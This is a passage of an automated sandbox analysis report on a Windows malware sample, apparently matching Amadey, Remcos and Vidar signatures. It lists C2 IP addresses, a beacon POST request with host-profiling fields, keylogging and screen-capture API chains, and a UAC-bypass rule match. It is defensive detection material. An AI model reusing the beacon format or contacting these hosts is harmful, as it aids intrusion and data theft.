                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.2.169
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.2.169
                                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.2.169
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.2.169
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.2.169
                                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.2.169
                                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.2.169
                                Source: unknownTCP traffic detected without corresponding DNS query: 116.202.2.169
                                Source: unknownHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49808 version: TLS 1.2

                                Key, Mouse, Clipboard, Microphone and Screen Capturing

                                barindex
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0041680F OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_0041680F
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,2_2_0040A3E0
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0040B65C OpenClipboard,GetClipboardData,CloseClipboard,2_2_0040B65C
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0040B65C OpenClipboard,GetClipboardData,CloseClipboard,2_2_0040B65C
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0041AD48 _memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,_MSFOpenExW,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,3_2_0041AD48
                                Source: yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>memstr_e3c4c6c9-e

                                E-Banking Fraud

                                barindex
                                Source: Yara matchFile source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: yaALNupJCH.exe PID: 7536, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0041C930 SystemParametersInfoW,2_2_0041C930

                                System Summary

                                barindex
                                Source: yaALNupJCH.exe, type: SAMPLEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
                                Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                                Source: 2.2.yaALNupJCH.exe.cb0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
                                Source: 3.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
                                Source: 0.2.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
                                Source: 0.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
                                Source: 2.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
                                Source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                                Source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                                Source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                                Source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                                Source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
                                Source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                                Source: 00000000.00000000.875302819.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
                                Source: 00000003.00000002.907305691.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
                                Source: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
                                Source: 00000002.00000000.882851946.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
                                Source: 00000003.00000000.886541366.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
                                Source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                                Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                                Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                                Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                                Source: Process Memory Space: yaALNupJCH.exe PID: 7536, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                                Source: Process Memory Space: yaALNupJCH.exe PID: 7592, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7592 -s 2020
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CB5E900_2_00CB5E90
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CD41910_2_00CD4191
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CD09180_2_00CD0918
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CD42B10_2_00CD42B1
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CC62400_2_00CC6240
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CEA2510_2_00CEA251
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CD64C00_2_00CD64C0
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CD04800_2_00CD0480
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CD550D0_2_00CD550D
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0041F0482_2_0041F048
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0043E00C2_2_0043E00C
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0045409A2_2_0045409A
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_004380A82_2_004380A8
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_004461302_2_00446130
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0045326C2_2_0045326C
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0043E23B2_2_0043E23B
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_004272EB2_2_004272EB
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_004374262_2_00437426
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0043E4982_2_0043E498
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_004386B02_2_004386B0
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0043783E2_2_0043783E
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0044D8892_2_0044D889
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_004338942_2_00433894
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_004279942_2_00427994
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00427AFD2_2_00427AFD
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0041DAB02_2_0041DAB0
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00437C732_2_00437C73
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00426D5C2_2_00426D5C
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0043DDDD2_2_0043DDDD
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00435DA12_2_00435DA1
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00413F182_2_00413F18
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00436F2A2_2_00436F2A
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CD41912_2_00CD4191
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CD42B12_2_00CD42B1
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CC62402_2_00CC6240
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CEA2512_2_00CEA251
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CD64C02_2_00CD64C0
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CD04802_2_00CD0480
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CD550D2_2_00CD550D
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CD09182_2_00CD0918
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00421BF13_2_00421BF1
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_004240563_2_00424056
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_004230693_2_00423069
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0040715C3_2_0040715C
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_004211CC3_2_004211CC
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_004061D53_2_004061D5
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0043533F3_2_0043533F
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_004234FE3_2_004234FE
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0040583B3_2_0040583B
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0043489D3_2_0043489D
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0042389C3_2_0042389C
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00436A5F3_2_00436A5F
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00435A1B3_2_00435A1B
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00423C6E3_2_00423C6E
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00425C103_2_00425C10
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00407C8C3_2_00407C8C
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0041FD503_2_0041FD50
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00434DEE3_2_00434DEE
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61EAD2AC3_2_61EAD2AC
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E4B8A13_2_61E4B8A1
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E88FCA3_2_61E88FCA
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E75F1F3_2_61E75F1F
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61EA91F63_2_61EA91F6
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E9316A3_2_61E9316A
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E9F0ED3_2_61E9F0ED
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61EA70CF3_2_61EA70CF
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E9D0C33_2_61E9D0C3
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E8D0B63_2_61E8D0B6
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E400653_2_61E40065
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E6904E3_2_61E6904E
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E4304E3_2_61E4304E
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E153373_2_61E15337
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E9E24F3_2_61E9E24F
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E5023C3_2_61E5023C
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E192083_2_61E19208
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E625543_2_61E62554
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E534E33_2_61E534E3
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E4E4BF3_2_61E4E4BF
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E774523_2_61E77452
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E947833_2_61E94783
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E7A7903_2_61E7A790
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E187363_2_61E18736
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E586703_2_61E58670
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E379303_2_61E37930
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E108563_2_61E10856
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E7B85E3_2_61E7B85E
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E218163_2_61E21816
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E9FBF03_2_61E9FBF0
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E55BD73_2_61E55BD7
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61EA0BA93_2_61EA0BA9
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61EA5B623_2_61EA5B62
                                Source: yaALNupJCH.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: yaALNupJCH.exe, type: SAMPLEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
                                Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                                Source: 2.2.yaALNupJCH.exe.cb0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
                                Source: 3.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
                                Source: 0.2.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
                                Source: 3.2.yaALNupJCH.exe.cb0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
                                Source: 0.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
                                Source: 2.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
                                Source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                                Source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                                Source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                                Source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                                Source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
                                Source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                                Source: 00000000.00000000.875302819.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
                                Source: 00000003.00000002.907305691.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
                                Source: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
